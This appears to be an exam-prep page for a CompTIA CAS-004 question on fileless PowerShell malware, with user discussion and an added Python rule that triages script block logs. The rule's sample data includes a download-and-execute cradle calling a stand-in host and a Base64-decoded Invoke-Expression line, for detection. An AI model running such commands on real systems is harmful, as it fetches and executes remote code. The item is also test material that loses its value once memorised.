Exam CAS-004
Question 105

A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware.

Which of the following BEST describes the type of malware the solution should protect against?

    Correct Answer: C

    Fileless malware is a type of malicious software that operates in memory rather than writing files to the hard disk, making it more difficult to detect with traditional antivirus solutions that rely on scanning files. This type of malware often uses legitimate system tools, such as PowerShell, to execute its payload, which aligns with the scenario described where the malware used the Invoke-Expression function in PowerShell and no Indicators of Compromise (IOCs) were found on disk.
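Because the payload never touches disk, the evidence of this attack lives in PowerShell script block logging (Event ID 4104) rather than in an antivirus file scan. The following added example (not part of the exam page) shows a small triage rule over constructed script block entries: it flags Invoke-Expression or its alias iex, and raises severity when the same block also fetches remote content or decodes Base64, while ignoring the cmdlet name when it only appears inside a string literal. The event records, hosts and script text are all constructed sample data.

```python
import re

# Constructed sample of PowerShell script block log text (what Event ID 4104
# records when script block logging is enabled). Not real captured data.
SAMPLE_EVENTS = [
    {"id": 1, "host": "srv01",
     "script": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"},
    {"id": 2, "host": "srv01",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"},
    {"id": 3, "host": "srv02",
     "script": "$b = Get-Content .\\x.txt; Invoke-Expression ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b)))"},
    {"id": 4, "host": "srv02",
     "script": "Write-Host 'Invoke-Expression is documented in about_Invoke'"},
]

# Indicators. Invoke-Expression and its alias iex are matched as a bare token
# so the rule does not fire on similar-looking names or on quoted text.
STRING_LITERAL = re.compile(r"'[^']*'|\"[^\"]*\"")
INVOKE = re.compile(r"(?<![\w-])(?:Invoke-Expression|iex)(?![\w-])", re.IGNORECASE)
REMOTE_FETCH = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod", re.IGNORECASE)
DECODE = re.compile(r"FromBase64String", re.IGNORECASE)


def indicators(script: str) -> list[str]:
    """Return the indicator names found in one script block."""
    code_only = STRING_LITERAL.sub("''", script)  # blank out literals first
    found = []
    if INVOKE.search(code_only):
        found.append("invoke-expression")
    if REMOTE_FETCH.search(code_only):
        found.append("remote-fetch")
    if DECODE.search(code_only):
        found.append("base64-decode")
    return found


def severity(found: list[str]) -> str:
    """Invoke-Expression fed by a download or a decode is the in-memory pattern."""
    if "invoke-expression" in found and len(found) > 1:
        return "high"
    return "medium" if found else "none"


def triage(events) -> list[tuple[int, str, str, list[str]]]:
    """Return (event id, host, severity, indicators) for every event that matched."""
    out = []
    for ev in events:
        found = indicators(ev["script"])
        sev = severity(found)
        if sev != "none":
            out.append((ev["id"], ev["host"], sev, found))
    return out


if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(row)
```

Pattern matching on script block text is one layer of the EDR-style behavioural monitoring the discussion mentions; it complements, rather than replaces, file scanning.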

Discussion
BiteSize Option: C

Antivirus software is signature-based and scans when the data is at rest or accessed. Logic bombs, rootkits, and worms reside on the filesystem. Fileless means it is volatile, temporary, and exists in RAM. Source: verifying each answer against ChatGPT, my experience, other test banks, a written book, and weighing in the discussion from all users to create a 100% accurate guide for myself before I take the exam. (It isn't easy because of the time needed, but I am doing my due diligence.)

dangerelchulo Option: C

Key point is that it used PowerShell and it was not found by antivirus, so it uses an exploit. https://www.crowdstrike.com/cybersecurity-101/malware/fileless-malware/

ryanzou Option: C

Fileless malware is a type of malicious activity that uses native, legitimate tools built into a system to execute a cyber attack.

david124 Option: C

Fileless is the right answer.

OdinAtlasSteel Option: C

The use of PowerShell and the Invoke-Expression function indicates that the attack is leveraging the scripting capabilities within the system, which is a hallmark of fileless malware. The absence of Indicators of Compromise (IOCs) on disk, despite scanning with an antivirus, suggests that the malware might be operating in memory or using fileless techniques.

fb2fcb1 Option: C

C. Fileless. A fileless malware attack involves malware that operates in memory, instead of writing files to the hard drive, making it more challenging to detect with traditional antivirus solutions. This type of malware can use legitimate scripting languages (like PowerShell) and tools native to the operating system to execute malicious activities, which seems to match the situation described in the question.

Worms (A) are a type of malware that spread across networks, typically without user intervention. Logic bombs (B) are malicious payloads that are triggered by a specific event. Rootkits (D) are malware that provide privileged (root-level) access to a computer while hiding their presence. While any of these could theoretically use fileless techniques, the specific focus on PowerShell and the failure of disk scanning to find Indicators of Compromise (IOCs) suggest fileless malware is the most accurate answer.

Alizadeh Option: C

The description of the attack suggests that the type of malware the solution should protect against is Fileless malware. Therefore, the correct option is C.

hidady Option: C

C is the correct answer.

23169fd Option: C

Characteristics: Fileless malware does not write any files to disk. Instead, it resides in memory and uses legitimate system tools (such as PowerShell) to execute malicious activities.

Behavior: Since it operates in memory, it can evade traditional antivirus solutions that rely on scanning files on disk. This type of malware often leverages built-in tools like PowerShell to download and execute malicious scripts directly from the internet.

Detection and Protection: Protecting against fileless malware typically involves using endpoint detection and response (EDR) tools, advanced threat protection solutions, and monitoring for unusual behavior and use of system tools.